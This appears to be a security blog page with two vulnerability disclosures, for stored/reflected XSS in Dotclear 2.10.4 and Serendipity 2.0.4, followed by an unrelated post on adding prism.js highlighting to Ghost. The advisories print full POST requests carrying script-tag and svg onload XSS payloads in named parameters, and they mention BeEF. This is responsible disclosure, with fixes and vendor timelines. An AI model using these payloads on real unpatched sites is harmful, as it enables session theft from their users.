Edric Teo

[CVE-2016-9891] Dotclear – XSS Vulnerability in Version 2.10.4

Product Information:

Software: Dotclear

Tested Version: 2.10.4, released 02.11.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: The project’s purpose is to provide a user-friendly tool allowing anyone to publish on the web, regardless of their technical skills. (copied from https://dotclear.org/about#undefined)

Vulnerability description:

There is a XSS vulnerability in the /dotcl/admin/media_item.php page.

When an authenticated user of Dotclear renames the file title, the following POST request is sent to the server:

POST /dotcl/admin/media_item.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/dotcl/admin/media_item.php?id=4&plugin_id=&popup=0&select=0
Cookie: sidebar-pref=null; dcxd=0408528968495153b0822146207aaaa66d0118f0; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 201
media_file=testimage.png&media_title=<script>alert(0)</script>.png&media_dt=2016-11-25 19:12&popup=0&select=0&post_id=&id=4&xd_check=8850df45055dfadff791dfbbbd25ed16a16aa3ae

The parameter media_title is vulnerable to XSS.

The payload is executed when an authenticated user navigates to the /dotcl/admin/media.php page.

When embedding an image or adding an attachment under Entries, the media.php page will be called and the payload will trigger as well.

Impact:

An attacker is able to inject malicious scripts into otherwise benign and trusted websites. The malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can also rewrite the contents of an HTML page. The exploitation process is also made easy with BeEF (The Browser Exploitation Framework).

Solution:

Update to the latest version, which is 2.11.1 (fixed since 2.11), see https://dotclear.org/blog/post/2016/12/28/Dotclear-2.11

Timeline:

Vulnerability found: 26.11.2016

The vendor informed: 05.12.2016

Response by vendor: 05.12.2016

Fix by vendor: 05.12.2016

The patched version released: 28.12.2016

Public Advisory: 29.12.2016

References:

https://dev.dotclear.org/2.0/changeset/5536ac77e915

https://hg.dotclear.org/dotclear/rev/712559193a6e

[CVE-2016-9681] Serendipity CMS – XSS Vulnerability in Version 2.0.4

Product Information:

Software: Serendipity CMS

Tested Version: 2.0.4, released 26.09.2016

Vulnerability Type: Cross-Site Scripting (CWE-79)

Download link: https://github.com/s9y/Serendipity/releases/tag/2.0.4

Description: Serendipity is a PHP-powered weblog engine that gives the user an easy way to maintain a blog. While the default package is designed for the casual blogger, Serendipity offers an expandable framework with the power for professional applications. (copied from https://docs.s9y.org/)

Vulnerability description:

There are two XSS vulnerabilities in Serendipity CMS.

1) XSS in the creation of a new category page

2) XSS in the creation of the base directory page

Category Page

When an authenticated user of Serendipity CMS is creating a new category, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=category&serendipity[adminAction]=new
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=9e3d614472aa8c3659f653b47fd193a31777f150; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 380

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[cat][name]=<script>alert(0)</script>&serendipity[cat][description]=&serendipity[cat][parent_cat]=0&serendipity[cat][hide_sub]=0&serendipity[cat][read_authors][]=0&serendipity[cat][write_authors][]=0&serendipity[cat][icon]=&SAVE=Create

The parameter serendipity[cat][name] is vulnerable to XSS.

The payload is executed when an authenticated user creates another category.

Base Directory Page

When an authenticated user of Serendipity CMS is creating a new base directory, the following POST request is sent to the server:

POST /s9y/serendipity_admin.php?serendipity[step]=directoryDoCreate&serendipity[adminModule]=images&serendipity[adminAction]=directoryDoCreate HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/s9y/serendipity_admin.php?serendipity[adminModule]=images&serendipity[adminAction]=directoryCreate
Cookie: serendipity[old_session]=u4l95320lc39fen9n2f8o04jm5; serendipity[userDefLang]=en; serendipity[addmedia_directory]=undefined; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.name; serendipity[sortorder_ordermode]=DESC; serendipity[only_path]=; serendipity[only_filename]=; serendipity[toggle_extended]=true; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; accessibletab_mediaupload_tabs_active=1; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=400; serendipity[imgWidth]=480; serendipity[imgHeight]=480; serendipity[imgID]=5; serendipity[baseURL]=http://127.0.0.1/s9y/; serendipity[indexFile]=index.php; serendipity[imgName]=/s9y/uploads/img_src1_onerroralert1223e.png; serendipity[thumbName]=/s9y/uploads/img_src1_onerroralert1223e.serendipityThumb.png; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; serendipity[author_token]=31fd07e44a90a6bd7a8a03010660df86790eb948; s9y_9afefbce28571f388f27f61da1993391=u4l95320lc39fen9n2f8o04jm5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

serendipity[token]=355e14e9bde891a03aef7cc5b19d8fab&serendipity[name]=</script><svg onload=alert(0)>&serendipity[parent]=&SAVE=Create directory

The parameter serendipity[name] is vulnerable to reflected XSS.

The payload is executed immediately upon creating the new directory and it occurs only once.

Impact:

Solution:

Update to the latest version, which is 2.0.5, see https://blog.s9y.org/archives/271-Serendipity-2.0.5-and-2.1-beta3-released.html

Timeline:

Vulnerability found: 25.11.2016

The vendor informed: 26.11.2016

Response by vendor: 28.11.2016

Fix by vendor: 28.11.2016

Public Advisory: 03.12.2016

Reference:

https://github.com/s9y/Serendipity/commit/e2a665e13b7de82a71c9bbb77575d15131b722be

prismjs CDN: Implementation of Syntax Highlighting in Ghost CMS

Adding syntax highlighting is a must for all tech-related blogs and the process of doing this should not be difficult. When it comes to syntax highlighting, there are many options out there in the market. However, I’ve settled down with prism.js since it is lightweight and straightforward.

Besides, CloudFlare is serving through their CDN. Thus it’s a plus point for speed!

Just look at this beauty.

Adding prism.js to blog using cdn

Click on the <> Code Injection button under the settings
In the Blog, Header section add

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/prism/1.4.1/themes/prism.min.css">

In the Blog Footer section add

<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.4.1/prism.min.js"></script>

Syntax highlighting using prism.js

Create a new entry with the following:

```language-markup
<h1>hello world!</h1>
```

It should render the following:

_{Note that if you are using CloudFlare’s rocket loader, you are advised to ignore the scripts. You can read more here.}